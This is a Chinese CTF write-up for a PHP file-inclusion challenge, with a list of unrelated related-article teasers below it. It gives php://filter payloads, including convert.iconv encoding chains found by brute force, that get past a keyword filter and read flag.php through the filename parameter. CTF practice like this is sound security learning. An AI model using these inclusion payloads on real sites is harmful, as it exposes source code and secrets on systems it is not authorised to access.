【攻防世界】题目名称-文件包含

news/2024/6/17 1:58:08 标签: php, 网络安全, 安全, web安全

看到 include(),想到文件包含,用php伪协议。

知识点

看到 include(),require(),include_once(),require_once() ,想到文件包含,用php伪协议

?filename=php://filter/read=convert.base64-encode/resource=

?filename=php://filter/read=convert.base64-encode/resource=flag.php

一直显示 do not hack! ,可能是 include("./check.php") 过滤了

依次尝试如下payload,还是提示 do not hack
php://filter/convert.base64-encode/resource=flag.php
php://filter/convert.quoted-printable-encode/resource=flag.php
php://filter/string.rot13/resource=flag.php
php://filter/string.toupper/resource=flag.php
php://filter/string.tolower/resource=flag.php
php://filter/string.strip_tags/resource=flag.php

知识点

convert.iconv.[ ]过滤器

使用有两种方法:
convert.iconv.<input-encoding>.<output-encoding>
convert.iconv.<input-encoding>/<output-encoding>

用bp爆破一下。 要一个一个的试

找到输出编码,再找输入编码

/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

或者

/?filename=php://filter/convert.iconv.SJIS*.UCS-4*/resource=flag.php

通过本道题,你要知道:

(1)php://filter 其他编码方式。

(2)convert.iconv. 要一个一个的破解。


http://www.niftyadmin.cn/n/5479481.html

相关文章

刷好题,固基础-7

刷好题,固基础-7

L3-007 天梯地图 本题要求你实现一个天梯赛专属在线地图&#xff0c;队员输入自己学校所在地和赛场地点后&#xff0c;该地图应该推荐两条路线&#xff1a;一条是最快到达路线&#xff1b;一条是最短距离的路线。题目保证对任意的查询请求&#xff0c;地图上都至少存在一条可达…
阅读更多...
pyDAL一个python的ORM(补充1) pyDAL与pandas

pyDAL一个python的ORM(补充1) pyDAL与pandas

pandas是当前最流行的python数据分析处理的工具&#xff0c;dataframe是pandas最常用的数据对象&#xff0c;生成dataframe通常的方法通常为&#xff1a; 1、文件读取 使用read()方法&#xff0c;读取各种csv、excel、html、json等文件&#xff1b; 2、连接数据库&#xff0…
阅读更多...
C语言面试题之判定字符是否唯一

C语言面试题之判定字符是否唯一

判定字符是否唯一 实例要求 实现一个算法&#xff0c;确定一个字符串 s 的所有字符是否全都不同 实例分析 1、使用一个大小为 256 的bool数组 charSet 来记录字符是否出现过&#xff1b;2、遍历字符串时&#xff0c;如果字符已经在数组中标记过&#xff0c;则返回 false&a…
阅读更多...
深度学习-多尺度训练的介绍与应用

深度学习-多尺度训练的介绍与应用

一、引言 在当今快速发展的人工智能领域&#xff0c;多尺度训练已经成为了一种至关重要的技术&#xff0c;特别是在处理具有复杂结构和不同尺度特征的数据时。这种技术在许多应用中发挥着关键作用&#xff0c;例如图像识别、自然语言处理和视频分析等。 多尺度训练的定义 多尺…
阅读更多...
C/C++ 读取配置文件的几种方式

C/C++ 读取配置文件的几种方式

文章目录 1. protobuf2. opencv3. json4. gflags 1. protobuf 将配置信息读取到string流中 /*** brief 将配置文件读取到string流中* * param file_name &#xff1a;配置文件名称* param content: 读取后的string配置信息流* return true &#xff1a;成功读取* return fals…
阅读更多...
C#使用Selenium驱动Chrome浏览器

C#使用Selenium驱动Chrome浏览器

1.Selenium库依赖安装 Selenium WebDriver是Selenium项目的一部分&#xff0c;用于模拟用户在Web应用程序中的交互操作。它支持多种浏览器&#xff0c;如Chrome、Firefox、IE等&#xff0c;且与各种编程语言&#xff08;如Java、Python、C#等&#xff09;兼容&#xff0c;具有…
阅读更多...
“数字大冒险:探索二分查找的神奇之旅“

“数字大冒险:探索二分查找的神奇之旅“

前言 作者&#xff1a;小蜗牛向前冲 专栏&#xff1a;小蜗牛算法之路 专栏介绍&#xff1a;"蜗牛之道&#xff0c;攀登大厂高峰&#xff0c;让我们携手学习算法。在这个专栏中&#xff0c;将涵盖动态规划、贪心算法、回溯等高阶技巧&#xff0c;不定期为你奉上基础数据结构…
阅读更多...
VS Code开发插件使用 pnpm 打包异常的解决姿势

VS Code开发插件使用 pnpm 打包异常的解决姿势

前言 刚刚准备发一个插件&#xff0c;发现用 pnpm 打出一个本地插件包直接扑街了。 这里只聚焦错误问题的解决&#xff0c;不是发插件的教程。。 聊点背景信息&#xff0c;vscode 的插件命令行的是 vsce 这个模块提供的 cli 能力去做的 环境 pnpm : 8.x 错误截图 本地打…
阅读更多...
最新文章

Copyright @ 2022~2023